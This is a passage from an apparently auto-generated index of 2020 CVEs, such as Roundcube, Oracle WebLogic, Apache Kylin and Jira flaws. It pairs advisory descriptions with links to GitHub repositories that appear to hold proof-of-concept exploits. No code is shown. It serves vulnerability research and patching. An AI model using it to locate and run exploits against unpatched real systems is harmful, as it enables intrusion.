[mbadanoiu/CVE-2020-12625](https://github.com/mbadanoiu/CVE-2020-12625) + +### CVE-2020-12629 (2020-05-04) + +include/class.sla.php in osTicket before 1.14.2 allows XSS via the SLA Name. + + +- [mkelepce/CVE-2020-12629](https://github.com/mkelepce/CVE-2020-12629) + +### CVE-2020-12640 (2020-05-04) + +Roundcube Webmail before 1.4.4 allows attackers to include local files and execute code via directory traversal in a plugin name to rcube_plugin_api.php. + + +- [mbadanoiu/CVE-2020-12640](https://github.com/mbadanoiu/CVE-2020-12640) + +### CVE-2020-12641 (2020-05-04) + +rcube_image.php in Roundcube Webmail before 1.4.4 allows attackers to execute arbitrary code via shell metacharacters in a configuration setting for im_convert_path or im_identify_path. + + +- [mbadanoiu/CVE-2020-12641](https://github.com/mbadanoiu/CVE-2020-12641) +- [mbadanoiu/MAL-004](https://github.com/mbadanoiu/MAL-004) + +### CVE-2020-12688 +- [TheCyberGeek/Centreon-20.04](https://github.com/TheCyberGeek/Centreon-20.04) + +### CVE-2020-12695 (2020-06-08) + +The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue. + + +- [yunuscadirci/CallStranger](https://github.com/yunuscadirci/CallStranger) +- [corelight/callstranger-detector](https://github.com/corelight/callstranger-detector) + +### CVE-2020-12696 (2020-05-07) + +The iframe plugin before 4.5 for WordPress does not sanitize a URL. + + +- [g-rubert/CVE-2020-12696](https://github.com/g-rubert/CVE-2020-12696) + +### CVE-2020-12702 (2021-02-24) + +Weak encryption in the Quick Pairing mode in the eWeLink mobile application (Android application V4.9.2 and earlier, iOS application V4.9.1 and earlier) allows physically proximate attackers to eavesdrop on Wi-Fi credentials and other sensitive information by monitoring the Wi-Fi spectrum during the pairing process. + + +- [salgio/ESPTouchCatcher](https://github.com/salgio/ESPTouchCatcher) +- [salgio/eWeLink-QR-Code](https://github.com/salgio/eWeLink-QR-Code) + +### CVE-2020-12712 (2020-06-11) + +A vulnerability based on insecure user/password encryption in the JOE (job editor) component of SOS JobScheduler 1.12 and 1.13 allows attackers to decrypt the user/password that is optionally stored with a user's profile. + + +- [SanderUbink/CVE-2020-12712](https://github.com/SanderUbink/CVE-2020-12712) + +### CVE-2020-12717 (2020-05-14) + +The COVIDSafe (Australia) app 1.0 and 1.1 for iOS allows a remote attacker to crash the app, and consequently interfere with COVID-19 contact tracing, via a Bluetooth advertisement containing manufacturer data that is too short. This occurs because of an erroneous OpenTrace manuData.subdata call. The ABTraceTogether (Alberta), ProteGO (Poland), and TraceTogether (Singapore) apps were also affected. + + +- [wabzqem/covidsafe-CVE-2020-12717-exploit](https://github.com/wabzqem/covidsafe-CVE-2020-12717-exploit) + +### CVE-2020-12753 (2020-05-11) + +An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. Arbitrary code execution can occur via the bootloader because of an EL1/EL3 coldboot vulnerability involving raw_resources. The LG ID is LVE-SMP-200006 (May 2020). + + +- [shinyquagsire23/CVE-2020-12753-PoC](https://github.com/shinyquagsire23/CVE-2020-12753-PoC) + +### CVE-2020-12800 (2020-06-08) + +The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. + + +- [amartinsec/CVE-2020-12800](https://github.com/amartinsec/CVE-2020-12800) + +### CVE-2020-12828 (2020-05-21) + +An issue was discovered in AnchorFree VPN SDK before 1.3.3.218. The VPN SDK service takes certain executable locations over a socket bound to localhost. Binding to the socket and providing a path where a malicious executable file resides leads to executing the malicious executable file with SYSTEM privileges. + + +- [0xsha/ZombieVPN](https://github.com/0xsha/ZombieVPN) + +### CVE-2020-12856 (2020-05-18) + +OpenTrace, as used in COVIDSafe through v1.0.17, TraceTogether, ABTraceTogether, and other applications on iOS and Android, allows remote attackers to conduct long-term re-identification attacks and possibly have unspecified other impact, because of how Bluetooth is used. + + +- [alwentiu/COVIDSafe-CVE-2020-12856](https://github.com/alwentiu/COVIDSafe-CVE-2020-12856) + +### CVE-2020-12928 (2020-10-13) + +A vulnerability in a dynamically loaded AMD driver in AMD Ryzen Master V15 may allow any authenticated user to escalate privileges to NT authority system. + + +- [ekknod/AmdRyzenMasterCheat](https://github.com/ekknod/AmdRyzenMasterCheat) + +### CVE-2020-13094 (2020-05-18) + +Dolibarr before 11.0.4 allows XSS. + + +- [mkelepce/CVE-2020-13094](https://github.com/mkelepce/CVE-2020-13094) + +### CVE-2020-13151 (2020-08-05) + +Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database query. It attempts to restrict code execution by disabling os.execute() calls, but this is insufficient. Anyone with network access can use a crafted UDF to execute arbitrary OS commands on all nodes of the cluster at the permission level of the user running the Aerospike service. + + +- [b4ny4n/CVE-2020-13151](https://github.com/b4ny4n/CVE-2020-13151) + +### CVE-2020-13158 (2020-06-22) + +Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter. + + +- [InfoSec4Fun/CVE-2020-13158](https://github.com/InfoSec4Fun/CVE-2020-13158) + +### CVE-2020-13159 (2020-06-22) + +Artica Proxy before 4.30.000000 Community Edition allows OS command injection via the Netbios name, Server domain name, dhclient_mac, Hostname, or Alias field. NOTE: this may overlap CVE-2020-10818. + + +- [InfoSec4Fun/CVE-2020-13159](https://github.com/InfoSec4Fun/CVE-2020-13159) + +### CVE-2020-13162 (2020-06-16) + +A time-of-check time-of-use vulnerability in PulseSecureService.exe in Pulse Secure Client versions prior to 9.1.6 down to 5.3 R70 for Windows (which runs as NT AUTHORITY/SYSTEM) allows unprivileged users to run a Microsoft Installer executable with elevated privileges. + + +- [redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-](https://github.com/redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-) + +### CVE-2020-13254 (2020-06-03) + +An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage. + + +- [danpalmer/django-cve-2020-13254](https://github.com/danpalmer/django-cve-2020-13254) + +### CVE-2020-13259 (2020-09-16) + +A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. + + +- [UrielYochpaz/CVE-2020-13259](https://github.com/UrielYochpaz/CVE-2020-13259) + +### CVE-2020-13277 (2020-06-19) + +An authorization issue in the mirroring logic allowed read access to private repositories in GitLab CE/EE 10.6 and later through 13.0.5 + + +- [EXP-Docs/CVE-2020-13277](https://github.com/EXP-Docs/CVE-2020-13277) + +### CVE-2020-13401 (2020-06-02) + +An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service. + + +- [arax-zaeimi/Docker-Container-CVE-2020-13401](https://github.com/arax-zaeimi/Docker-Container-CVE-2020-13401) + +### CVE-2020-13405 (2020-07-16) + +userfiles/modules/users/controller/controller.php in Microweber before 1.1.20 allows an unauthenticated user to disclose the users database via a /modules/ POST request. + + +- [mrnazu/CVE-2020-13405](https://github.com/mrnazu/CVE-2020-13405) + +### CVE-2020-13424 (2020-05-23) + +The XCloner component before 3.5.4 for Joomla! allows Authenticated Local File Disclosure. + + +- [mkelepce/CVE-2020-13424](https://github.com/mkelepce/CVE-2020-13424) + +### CVE-2020-13457 +- [alt3kx/CVE-2020-13457](https://github.com/alt3kx/CVE-2020-13457) + +### CVE-2020-13519 (2020-12-18) + +A privilege escalation vulnerability exists in the WinRing0x64 Driver IRP 0x9c402088 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. An attacker can send a malicious IRP to trigger this vulnerability. + + +- [SpiralBL0CK/poc-for-CVE-2020-13519-still-under-construction-](https://github.com/SpiralBL0CK/poc-for-CVE-2020-13519-still-under-construction-) + +### CVE-2020-13640 (2020-06-18) + +A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request. (No 7.x versions are affected.) + + +- [asterite3/CVE-2020-13640](https://github.com/asterite3/CVE-2020-13640) + +### CVE-2020-13699 (2020-07-29) + +TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3. + + +- [Dilshan-Eranda/CVE-2020-13699](https://github.com/Dilshan-Eranda/CVE-2020-13699) + +### CVE-2020-13777 (2020-06-04) + +GnuTLS 3.6.x before 3.6.14 uses incorrect cryptography for encrypting a session ticket (a loss of confidentiality in TLS 1.2, and an authentication bypass in TLS 1.3). The earliest affected version is 3.6.4 (2018-09-24) because of an error in a 2018-09-18 commit. Until the first key rotation, the TLS server always uses wrong data in place of an encryption key derived from an application. + + +- [0xxon/cve-2020-13777](https://github.com/0xxon/cve-2020-13777) +- [shigeki/challenge_CVE-2020-13777](https://github.com/shigeki/challenge_CVE-2020-13777) +- [prprhyt/PoC_TLS1_3_CVE-2020-13777](https://github.com/prprhyt/PoC_TLS1_3_CVE-2020-13777) + +### CVE-2020-13851 (2020-06-11) + +Artica Pandora FMS 7.44 allows remote command execution via the events feature. + + +- [hadrian3689/pandorafms_7.44](https://github.com/hadrian3689/pandorafms_7.44) + +### CVE-2020-13884 (2020-06-08) + +Citrix Workspace App before 1912 on Windows has Insecure Permissions and an Unquoted Path vulnerability which allows local users to gain privileges during the uninstallation of the application. + + +- [hessandrew/CVE-2020-13884](https://github.com/hessandrew/CVE-2020-13884) + +### CVE-2020-13885 (2020-06-08) + +Citrix Workspace App before 1912 on Windows has Insecure Permissions which allows local users to gain privileges during the uninstallation of the application. + + +- [hessandrew/CVE-2020-13885](https://github.com/hessandrew/CVE-2020-13885) + +### CVE-2020-13886 (2020-11-26) + +Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 devices allow cgi-bin/cgiServer.exx?page=../ Directory Traversal. + + +- [Ls4ss/CVE-2020-13886](https://github.com/Ls4ss/CVE-2020-13886) + +### CVE-2020-13889 (2020-06-06) + +showAlert() in the administration panel in Bludit 3.12.0 allows XSS. + + +- [gh0st56/CVE-2020-13889](https://github.com/gh0st56/CVE-2020-13889) + +### CVE-2020-13925 (2020-07-14) + +Similar to CVE-2020-1956, Kylin has one more restful API which concatenates the API inputs into OS commands and then executes them on the server; while the reported API misses necessary input validation, which causes the hackers to have the possibility to execute OS command remotely. Users of all previous versions after 2.3 should upgrade to 3.1.0. + + +- [bit4woo/CVE-2020-13925](https://github.com/bit4woo/CVE-2020-13925) + +### CVE-2020-13933 (2020-08-17) + +Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass. + + +- [EXP-Docs/CVE-2020-13933](https://github.com/EXP-Docs/CVE-2020-13933) +- [0xkami/cve-2020-13933](https://github.com/0xkami/cve-2020-13933) +- [KingBangQ/CVE-2020-13933Project](https://github.com/KingBangQ/CVE-2020-13933Project) + +### CVE-2020-13935 (2020-07-14) + +The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service. + + +- [RedTeamPentesting/CVE-2020-13935](https://github.com/RedTeamPentesting/CVE-2020-13935) +- [aabbcc19191/CVE-2020-13935](https://github.com/aabbcc19191/CVE-2020-13935) + +### CVE-2020-13937 (2020-10-19) + +Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone. + + +- [yaunsky/CVE-2020-13937](https://github.com/yaunsky/CVE-2020-13937) +- [Al1ex/CVE-2020-13937](https://github.com/Al1ex/CVE-2020-13937) +- [kailing0220/CVE-2020-13937](https://github.com/kailing0220/CVE-2020-13937) + +### CVE-2020-13942 (2020-11-24) + +It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint. This was partially fixed in 1.5.1 but a new attack vector was found. In Apache Unomi version 1.5.2 scripts are now completely filtered from the input. It is highly recommended to upgrade to the latest available version of the 1.5.x release to fix this problem. + + +- [lp008/CVE-2020-13942](https://github.com/lp008/CVE-2020-13942) +- [eugenebmx/CVE-2020-13942](https://github.com/eugenebmx/CVE-2020-13942) +- [shifa123/CVE-2020-13942-POC-](https://github.com/shifa123/CVE-2020-13942-POC-) +- [blackmarketer/CVE-2020-13942](https://github.com/blackmarketer/CVE-2020-13942) +- [yaunsky/Unomi-CVE-2020-13942](https://github.com/yaunsky/Unomi-CVE-2020-13942) +- [hoanx4/apche_unomi_rce](https://github.com/hoanx4/apche_unomi_rce) +- [Prodrious/CVE-2020-13942](https://github.com/Prodrious/CVE-2020-13942) + +### CVE-2020-13945 (2020-12-07) + +In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5. + + +- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack) +- [K3ysTr0K3R/CVE-2020-13945-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2020-13945-EXPLOIT) +- [x0root/CVE-2020-13945-EXPLOIT](https://github.com/x0root/CVE-2020-13945-EXPLOIT) + +### CVE-2020-13957 (2020-10-13) + +Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions. + + +- [s-index/CVE-2020-13957](https://github.com/s-index/CVE-2020-13957) + +### CVE-2020-13958 (2020-11-17) + +A vulnerability in Apache OpenOffice scripting events allows an attacker to construct documents containing hyperlinks pointing to an executable on the target users file system. These hyperlinks can be triggered unconditionally. In fixed versions no internal protocol may be called from the document event handler and other hyperlinks require a control-click. + + +- [Grey-Junior/CVE-2020-13958](https://github.com/Grey-Junior/CVE-2020-13958) + +### CVE-2020-13965 (2020-06-09) + +An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview. + + +- [mbadanoiu/CVE-2020-13965](https://github.com/mbadanoiu/CVE-2020-13965) + +### CVE-2020-13973 (2020-06-09) + +OWASP json-sanitizer before 1.2.1 allows XSS. An attacker who controls a substring of the input JSON, and controls another substring adjacent to a SCRIPT element in which the output is embedded as JavaScript, may be able to confuse the HTML parser as to where the SCRIPT element ends, and cause non-script content to be interpreted as JavaScript. + + +- [epicosy/json-sanitizer](https://github.com/epicosy/json-sanitizer) + +### CVE-2020-13995 (2020-09-25) + +U.S. Air Force Sensor Data Management System extract75 has a buffer overflow that leads to code execution. An overflow in a global variable (sBuffer) leads to a Write-What-Where outcome. Writing beyond sBuffer will clobber most global variables until reaching a pointer such as DES_info or image_info. By controlling that pointer, one achieves an arbitrary write when its fields are assigned. The data written is from a potentially untrusted NITF file in the form of an integer. The attacker can gain control of the instruction pointer. + + +- [dbrumley/extract75-cve-2020-13995](https://github.com/dbrumley/extract75-cve-2020-13995) + +### CVE-2020-13996 (2020-06-09) + +The J2Store plugin before 3.3.13 for Joomla! allows a SQL injection attack by a trusted store manager. + + +- [mkelepce/CVE-2020-13996](https://github.com/mkelepce/CVE-2020-13996) + +### CVE-2020-14064 (2020-07-15) + +IceWarp Email Server 12.3.0.1 has Incorrect Access Control for user accounts. + + +- [networksecure/CVE-2020-14064](https://github.com/networksecure/CVE-2020-14064) + +### CVE-2020-14065 (2020-07-15) + +IceWarp Email Server 12.3.0.1 allows remote attackers to upload files and consume disk space. + + +- [networksecure/CVE-2020-14065](https://github.com/networksecure/CVE-2020-14065) +- [pinpinsec/CVE-2020-14065](https://github.com/pinpinsec/CVE-2020-14065) + +### CVE-2020-14066 (2020-07-15) + +IceWarp Email Server 12.3.0.1 allows remote attackers to upload JavaScript files that are dangerous for clients to access. + + +- [networksecure/CVE-2020-14066](https://github.com/networksecure/CVE-2020-14066) +- [pinpinsec/CVE-2020-14066](https://github.com/pinpinsec/CVE-2020-14066) + +### CVE-2020-14144 (2020-10-16) + +The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides. + + +- [p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce) + +### CVE-2020-14179 (2020-09-21) + +Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1. + + +- [c0brabaghdad1/CVE-2020-14179](https://github.com/c0brabaghdad1/CVE-2020-14179) +- [mrnazu/CVE-2020-14179](https://github.com/mrnazu/CVE-2020-14179) +- [0x0060/CVE-2020-14179](https://github.com/0x0060/CVE-2020-14179) + +### CVE-2020-14181 (2020-09-17) + +Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. + + +- [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira) +- [Rival420/CVE-2020-14181](https://github.com/Rival420/CVE-2020-14181) +- [bk-rao/CVE-2020-14181](https://github.com/bk-rao/CVE-2020-14181) + +### CVE-2020-14195 (2020-06-16) + +FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity). + + +- [Al1ex/CVE-2020-14195](https://github.com/Al1ex/CVE-2020-14195) + +### CVE-2020-14210 (2020-06-16) + +Reflected Cross-Site Scripting (XSS) vulnerability in MONITORAPP WAF in which script can be executed when responding to Request URL information. It provides a function to response to Request URL information when blocking. + + +- [monitorapp-aicc/report](https://github.com/monitorapp-aicc/report) + +### CVE-2020-14292 (2020-09-09) + +In the COVIDSafe application through 1.0.21 for Android, unsafe use of the Bluetooth transport option in the GATT connection allows attackers to trick the application into establishing a connection over Bluetooth BR/EDR transport, which reveals the public Bluetooth address of the victim's phone without authorisation, bypassing the Bluetooth address randomisation protection in the user's phone. + + +- [alwentiu/CVE-2020-14292](https://github.com/alwentiu/CVE-2020-14292) + +### CVE-2020-14293 (2020-10-02) + +conf_datetime in Secudos DOMOS 5.8 allows remote attackers to execute arbitrary commands as root via shell metacharacters in the zone field (obtained from the web interface). + + +- [patrickhener/CVE-2020-14293](https://github.com/patrickhener/CVE-2020-14293) + +### CVE-2020-14294 (2020-10-02) + +An issue was discovered in Secudos Qiata FTA 1.70.19. The comment feature allows persistent XSS that is executed when reading transfer comments or the global notice board. + + +- [patrickhener/CVE-2020-14294](https://github.com/patrickhener/CVE-2020-14294) + +### CVE-2020-14295 (2020-06-17) + +A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries. + + +- [0z09e/CVE-2020-14295](https://github.com/0z09e/CVE-2020-14295) +- [mrg3ntl3m4n/CVE-2020-14295](https://github.com/mrg3ntl3m4n/CVE-2020-14295) + +### CVE-2020-14321 (2022-08-16) + +In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course. + + +- [HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321) +- [lanzt/CVE-2020-14321](https://github.com/lanzt/CVE-2020-14321) +- [f0ns1/CVE-2020-14321-modified-exploit](https://github.com/f0ns1/CVE-2020-14321-modified-exploit) + +### CVE-2020-14343 (2021-02-09) + +A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747. + + +- [j4k0m/loader-CVE-2020-14343](https://github.com/j4k0m/loader-CVE-2020-14343) + +### CVE-2020-14356 (2020-08-19) + +A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system. + + +- [ShaikUsaf/linux-4.19.72_CVE-2020-14356](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-14356) + +### CVE-2020-14364 (2020-08-31) + +An out-of-bounds read/write access flaw was found in the USB emulator of the QEMU in versions before 5.2.0. This issue occurs while processing USB packets from a guest when USBDevice 'setup_len' exceeds its 'data_buf[4096]' in the do_token_in, do_token_out routines. This flaw allows a guest user to crash the QEMU process, resulting in a denial of service, or the potential execution of arbitrary code with the privileges of the QEMU process on the host. + + +- [gejian-iscas/CVE-2020-14364](https://github.com/gejian-iscas/CVE-2020-14364) +- [y-f00l/CVE-2020-14364](https://github.com/y-f00l/CVE-2020-14364) + +### CVE-2020-14368 (2020-12-14) + +A flaw was found in Eclipse Che in versions prior to 7.14.0 that impacts CodeReady Workspaces. When configured with cookies authentication, Theia IDE doesn't properly set the SameSite value, allowing a Cross-Site Request Forgery (CSRF) and consequently allowing a cross-site WebSocket hijack on Theia IDE. This flaw allows an attacker to gain full access to the victim's workspace through the /services endpoint. To perform a successful attack, the attacker conducts a Man-in-the-middle attack (MITM) and tricks the victim into executing a request via an untrusted link, which performs the CSRF and the Socket hijack. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. + + +- [codingchili/CVE-2020-14368](https://github.com/codingchili/CVE-2020-14368) + +### CVE-2020-14372 (2021-03-03) + +A flaw was found in grub2 in versions prior to 2.06, where it incorrectly enables the usage of the ACPI command when Secure Boot is enabled. This flaw allows an attacker with privileged access to craft a Secondary System Description Table (SSDT) containing code to overwrite the Linux kernel lockdown variable content directly into memory. The table is further loaded and executed by the kernel, defeating its Secure Boot lockdown and allowing the attacker to load unsigned code. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability. + + +- [kukrimate/CVE-2020-14372](https://github.com/kukrimate/CVE-2020-14372) + +### CVE-2020-14381 (2020-12-03) + +A flaw was found in the Linux kernel’s futex implementation. This flaw allows a local attacker to corrupt system memory or escalate their privileges when creating a futex on a filesystem that is about to be unmounted. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. + + +- [nanopathi/linux-4.19.72_CVE-2020-14381](https://github.com/nanopathi/linux-4.19.72_CVE-2020-14381) + +### CVE-2020-14386 (2020-09-16) + +A flaw was found in the Linux kernel before 5.9-rc4. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity. + + +- [cgwalters/cve-2020-14386](https://github.com/cgwalters/cve-2020-14386) + +### CVE-2020-14644 (2020-07-15) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [0xkami/cve-2020-14644](https://github.com/0xkami/cve-2020-14644) + +### CVE-2020-14645 (2020-07-15) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [Y4er/CVE-2020-14645](https://github.com/Y4er/CVE-2020-14645) +- [DaBoQuan/CVE-2020-14645](https://github.com/DaBoQuan/CVE-2020-14645) +- [ChenZIDu/CVE-2020-14645](https://github.com/ChenZIDu/CVE-2020-14645) +- [HYWZ36/CVE-2020-14645-code](https://github.com/HYWZ36/CVE-2020-14645-code) +- [Schira4396/CVE-2020-14645](https://github.com/Schira4396/CVE-2020-14645) + +### CVE-2020-14750 (2020-11-01) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [pprietosanchez/CVE-2020-14750](https://github.com/pprietosanchez/CVE-2020-14750) +- [kkhacklabs/CVE-2020-14750](https://github.com/kkhacklabs/CVE-2020-14750) + +### CVE-2020-14756 (2021-01-20) + +Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [Y4er/CVE-2020-14756](https://github.com/Y4er/CVE-2020-14756) +- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021) + +### CVE-2020-14871 (2020-10-21) + +Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). + + +- [robidev/CVE-2020-14871-Exploit](https://github.com/robidev/CVE-2020-14871-Exploit) + +### CVE-2020-14882 (2020-10-21) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [zhzyker/exphub](https://github.com/zhzyker/exphub) +- [jas502n/CVE-2020-14882](https://github.com/jas502n/CVE-2020-14882) +- [s1kr10s/CVE-2020-14882](https://github.com/s1kr10s/CVE-2020-14882) +- [XTeam-Wing/CVE-2020-14882](https://github.com/XTeam-Wing/CVE-2020-14882) +- [0thm4n3/cve-2020-14882](https://github.com/0thm4n3/cve-2020-14882) +- [wsfengfan/cve-2020-14882](https://github.com/wsfengfan/cve-2020-14882) +- 